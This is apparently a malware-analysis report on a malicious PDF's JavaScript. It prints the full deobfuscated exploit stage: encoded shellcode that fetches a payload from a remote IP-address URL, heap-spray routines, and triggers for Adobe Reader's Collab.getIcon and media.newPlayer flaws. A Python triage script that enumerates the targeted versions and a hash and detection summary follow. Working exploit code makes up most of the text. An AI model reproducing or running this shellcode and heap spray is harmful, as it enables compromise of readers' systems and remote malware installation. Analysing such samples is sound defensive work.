5%u6C64%uC66C%u1D44%u0009%u8A59%u04C1%u8830%u1D44%u4104%u6A51%u6A00%u5300%u6A57%uFF00%u1456%uC085%u1675%u006A%uFF53%u0456%u006A%uEB83%u530C%u56FF%u8304%u0CC3%u02EB%u13EB%u8047%u003F%uFA75%u8047%u003F%uC475%u006A%uFE6A%u56FF%uE808%uFE9C%uFFFF%u4E8E%uEC0E%uFE98%u0E8A%u6F89%uBD01%uCA33%u5B8A%uC61B%u7946%u1A36%u702F%u7468%u7074%u2F3A%u392F%u2E31%u3232%u2E38%u3331%u2E33%u3635%u6D2F%u3079%u3039%u3139%u2F31%u3731%u3332%u3166%u3865%u3065%u3964%u6236%u6637%u6238%u6563%u6135%u6163%u6331%u6666%u3836%u3530%u642F%u2E38%u6870%u3F70%u3D66%u006E%u0000';function _3o(){var _4o=app.viewerVersion.toString();_4o=_4o.replace('.','');while(_4o.length<4){_4o+='0';}_4o=parseInt(_4o,10);return _4o;}function _5o(){function _6o(){var _7o='p@111111111111111111111111 : yyyy111';util.printd(_7o,new Date());}var _8o=12000;_9o=new Array();var _1o0='%u9090%u9090';var _1o1=_2o;_1o0=unescape(_1o0);_1o1=unescape(_1o1);while(_1o0.length<=0x8000){_1o0+=_1o0;}_1o0=_1o0.substr(0,0x8000-_1o1.length); for(_1o2=0;_1o2<_8o;_1o2++){_9o[_1o2]=_1o0+_1o1;}if(_8o){_6o();_6o();try{this.media.newPlayer(null);}catch(e){}_6o();}}function _1o3(){var 
_1o4=unescape(_1o);_1o5=unescape('%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090')+_1o4;_1o6=unescape('%u9090%u9090');_1o7=10;_1o8=_1o7+_1o5.length;while(_1o6.length<_1o8)_1o6+=_1o6;_1o9=_1o6.substring(0,_1o8);_2o2=_1o6.substring(0,_1o6.length-_1o8);while(_2o2.length+_1o8<0x40000)_2o2=_2o2+_2o2+_1o9;_2o0=new Array();for(_2o1=0;_2o1<180;_2o1++)_2o0[_2o1]=_2o2+_1o5;var _2o3=4012;var _2o4=Array(_2o3);for(_2o1=0;_2o1<_2o3;_2o1++){_2o4[_2o1]=unescape('%0a%0a%0a%0a');}Collab.getIcon(_2o4+'_N.bundle');}var _4o=_3o();if(((_4o>8950)&&(_4o<9050))||((_4o>=8000)&&(_4o<=8102))){_1o3();}else if((_4o>=9100)||(_4o<=9200)||(_4o>=8103)||(_4o<=8107)){_5o();}
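The viewer-version normalisation (_3o) and the branch selection at the end of the stage shown above, re-implemented in Python as an added example (not the analyzer's code) so the targeted Reader versions can be enumerated without running the sample. The inputs are constructed strings standing in for what app.viewerVersion.toString() returns; the "&&" variant is an assumption about what the author meant, not code from the sample.

```python
# Added example (not the analyzer's own code): the recovered stage's viewer-version
# normalisation and branch selection, re-implemented in Python so the targeted Reader
# versions can be enumerated without running the sample.
import re

JS_INT = re.compile(r"\s*[+-]?\d+")


def parse_int_js(s):
    """parseInt(s, 10): a leading run of digits, or None where JavaScript gives NaN."""
    m = JS_INT.match(s)
    return int(m.group()) if m else None


def normalize_viewer_version(version_string):
    """_3o(): app.viewerVersion.toString(), first '.' removed, right-padded with '0'
    to four characters, then parseInt. Note replace() only strips the FIRST dot, so
    a three-part string such as "8.1.3" becomes "81.3" and parses as 81."""
    s = version_string.replace(".", "", 1)
    while len(s) < 4:
        s += "0"
    return parse_int_js(s)


def select_branch(v):
    """The gate exactly as written in the sample. The else-if chains its bounds with
    '||', so it holds for every number: any version that misses the first test runs
    the media.newPlayer path."""
    if v is None:
        return "none"                      # NaN compares false everywhere in JS
    if (8950 < v < 9050) or (8000 <= v <= 8102):
        return "Collab.getIcon"            # _1o3(): CVE-2009-0927, shellcode _1o (d7.php?f=g)
    if v >= 9100 or v <= 9200 or v >= 8103 or v <= 8107:
        return "media.newPlayer"           # _5o(): CVE-2009-4324, shellcode _2o (d8.php?f=n)
    return "none"


def select_branch_with_and(v):
    """Assumption, not from the sample: the same ranges with '&&' between each pair of
    bounds, i.e. the reading the version numbers suggest the author intended."""
    if v is None:
        return "none"
    if (8950 < v < 9050) or (8000 <= v <= 8102):
        return "Collab.getIcon"
    if (9100 <= v <= 9200) or (8103 <= v <= 8107):
        return "media.newPlayer"
    return "none"


def triage(version_strings):
    """Per viewerVersion string: normalised value, branch as written, branch with '&&'."""
    rows = {}
    for vs in version_strings:
        n = normalize_viewer_version(vs)
        rows[vs] = (n, select_branch(n), select_branch_with_and(n))
    return rows


if __name__ == "__main__":
    # Constructed inputs standing in for (app.viewerVersion).toString() on a few builds.
    for vs, row in triage(["9", "9.1", "8.1", "8.12", "8.1.3", "7.05"]).items():
        print(f"{vs:>6} -> {row}")
```

With the gate as written, only normalised values in 8951..9049 and 8000..8102 reach Collab.getIcon; every other value, including versions far outside the 8.1.x/9.1.x ranges the second test names, reaches media.newPlayer. With "&&" the same out-of-range values would hit neither exploit.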

| Filename | Kind | Source | Size |
|---|---|---|---|
| generic_stage_recovery_001.js | deobfuscated-js | generic stage recovery (percent-decode) from JavaScript object 76 at offset 0x38A | 4461 bytes |

SHA-256: 32224d3bfc2dc7365885f6397f515c4908cab0e041589cb1d176584a333a3a4a

Detection
ClamAV: No threats found
Obfuscation or payload: likely (carved artifact contains 6 eval/decoder/string-building tokens)

Preview (first 1,000 lines of the extracted script; the percent-decode pass has turned the %0a%0a%0a%0a argument of the getIcon trigger into four raw newlines inside the string literal, which is why this stage is 8 bytes shorter than the previous one):
var _1o='%u8366%uFCE4%u85FC%u75E4%uE934%u335F%u64C0%u408B%u8B30%u0C40%u708B%u561C%u768B%u3308%u66DB%u5E8B%u033C%u3374%u812C%u15EE%uFF10%uB8FF%u408B%uC330%u3946%u7506%u87FB%u2434%uE485%u5175%uEBE9%u514C%u8B56%u3C75%u748B%u7835%uF503%u8B56%u2076%uF503%uC933%u4149%uADFC%uC503%uDB33%uBE0F%u3810%u74F2%uC108%u0DCB%uDA03%uEB40%u3BF1%u751F%u5EE6%u5E8B%u0324%u66DD%u0C8B%u8D4B%uEC46%u54FF%u0C24%uD88B%uDD03%u048B%u038B%uABC5%u595E%uEBC3%uAD53%u688B%u8020%u0C7D%u7433%u9603%uF3EB%u688B%u8B08%u6AF7%u5905%u98E8%uFFFF%uE2FF%uE8F9%u0000%u0000%u5058%u406A%uFF68%u0000%u5000%uC083%u5019%u8B55%u8BEC%u105E%uC383%uFF05%u68E3%u6E6F%u0000%u7568%u6C72%u546D%u16FF%uC483%u8B08%uE8E8%uFF61%uFFFF%u02EB%u72EB%uEC81%u0104%u0000%u5C8D%u0C24%u04C7%u7224%u6765%uC773%u2444%u7604%u3372%uC732%u2444%u2008%u732D%u5320%uF868%u0000%uFF00%u0C56%uE88B%uC933%uC751%u1D44%u7700%u6270%uC774%u1D44%u2E05%u6C64%uC66C%u1D44%u0009%u8A59%u04C1%u8830%u1D44%u4104%u6A51%u6A00%u5300%u6A57%uFF00%u1456%uC085%u1675%u006A%uFF53%u0456%u006A%uEB83%u530C%u56FF%u8304%u0CC3%u02EB%u13EB%u8047%u003F%uFA75%u8047%u003F%uC475%u006A%uFE6A%u56FF%uE808%uFE9C%uFFFF%u4E8E%uEC0E%uFE98%u0E8A%u6F89%uBD01%uCA33%u5B8A%uC61B%u7946%u1A36%u702F%u7468%u7074%u2F3A%u392F%u2E31%u3232%u2E38%u3331%u2E33%u3635%u6D2F%u3079%u3039%u3139%u2F31%u3731%u3332%u3166%u3865%u3065%u3964%u6236%u6637%u6238%u6563%u6135%u6163%u6331%u6666%u3836%u3530%u642F%u2E37%u6870%u3F70%u3D66%u0067%u0000';var 
_2o='%u8366%uFCE4%u85FC%u75E4%uE934%u335F%u64C0%u408B%u8B30%u0C40%u708B%u561C%u768B%u3308%u66DB%u5E8B%u033C%u3374%u812C%u15EE%uFF10%uB8FF%u408B%uC330%u3946%u7506%u87FB%u2434%uE485%u5175%uEBE9%u514C%u8B56%u3C75%u748B%u7835%uF503%u8B56%u2076%uF503%uC933%u4149%uADFC%uC503%uDB33%uBE0F%u3810%u74F2%uC108%u0DCB%uDA03%uEB40%u3BF1%u751F%u5EE6%u5E8B%u0324%u66DD%u0C8B%u8D4B%uEC46%u54FF%u0C24%uD88B%uDD03%u048B%u038B%uABC5%u595E%uEBC3%uAD53%u688B%u8020%u0C7D%u7433%u9603%uF3EB%u688B%u8B08%u6AF7%u5905%u98E8%uFFFF%uE2FF%uE8F9%u0000%u0000%u5058%u406A%uFF68%u0000%u5000%uC083%u5019%u8B55%u8BEC%u105E%uC383%uFF05%u68E3%u6E6F%u0000%u7568%u6C72%u546D%u16FF%uC483%u8B08%uE8E8%uFF61%uFFFF%u02EB%u72EB%uEC81%u0104%u0000%u5C8D%u0C24%u04C7%u7224%u6765%uC773%u2444%u7604%u3372%uC732%u2444%u2008%u732D%u5320%uF868%u0000%uFF00%u0C56%uE88B%uC933%uC751%u1D44%u7700%u6270%uC774%u1D44%u2E05%u6C64%uC66C%u1D44%u0009%u8A59%u04C1%u8830%u1D44%u4104%u6A51%u6A00%u5300%u6A57%uFF00%u1456%uC085%u1675%u006A%uFF53%u0456%u006A%uEB83%u530C%u56FF%u8304%u0CC3%u02EB%u13EB%u8047%u003F%uFA75%u8047%u003F%uC475%u006A%uFE6A%u56FF%uE808%uFE9C%uFFFF%u4E8E%uEC0E%uFE98%u0E8A%u6F89%uBD01%uCA33%u5B8A%uC61B%u7946%u1A36%u702F%u7468%u7074%u2F3A%u392F%u2E31%u3232%u2E38%u3331%u2E33%u3635%u6D2F%u3079%u3039%u3139%u2F31%u3731%u3332%u3166%u3865%u3065%u3964%u6236%u6637%u6238%u6563%u6135%u6163%u6331%u6666%u3836%u3530%u642F%u2E38%u6870%u3F70%u3D66%u006E%u0000';function _3o(){var _4o=app.viewerVersion.toString();_4o=_4o.replace('.','');while(_4o.length<4){_4o+='0';}_4o=parseInt(_4o,10);return _4o;}function _5o(){function _6o(){var _7o='p@111111111111111111111111 : yyyy111';util.printd(_7o,new Date());}var _8o=12000;_9o=new Array();var _1o0='%u9090%u9090';var _1o1=_2o;_1o0=unescape(_1o0);_1o1=unescape(_1o1);while(_1o0.length<=0x8000){_1o0+=_1o0;}_1o0=_1o0.substr(0,0x8000-_1o1.length); for(_1o2=0;_1o2<_8o;_1o2++){_9o[_1o2]=_1o0+_1o1;}if(_8o){_6o();_6o();try{this.media.newPlayer(null);}catch(e){}_6o();}}function _1o3(){var 
_1o4=unescape(_1o);_1o5=unescape('%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090')+_1o4;_1o6=unescape('%u9090%u9090');_1o7=10;_1o8=_1o7+_1o5.length;while(_1o6.length<_1o8)_1o6+=_1o6;_1o9=_1o6.substring(0,_1o8);_2o2=_1o6.substring(0,_1o6.length-_1o8);while(_2o2.length+_1o8<0x40000)_2o2=_2o2+_2o2+_1o9;_2o0=new Array();for(_2o1=0;_2o1<180;_2o1++)_2o0[_2o1]=_2o2+_1o5;var _2o3=4012;var _2o4=Array(_2o3);for(_2o1=0;_2o1<_2o3;_2o1++){_2o4[_2o1]=unescape('
');}Collab.getIcon(_2o4+'_N.bundle');}var _4o=_3o();if(((_4o>8950)&&(_4o<9050))||((_4o>=8000)&&(_4o<=8102))){_1o3();}else if((_4o>=9100)||(_4o<=9200)||(_4o>=8103)||(_4o<=8107)){_5o();}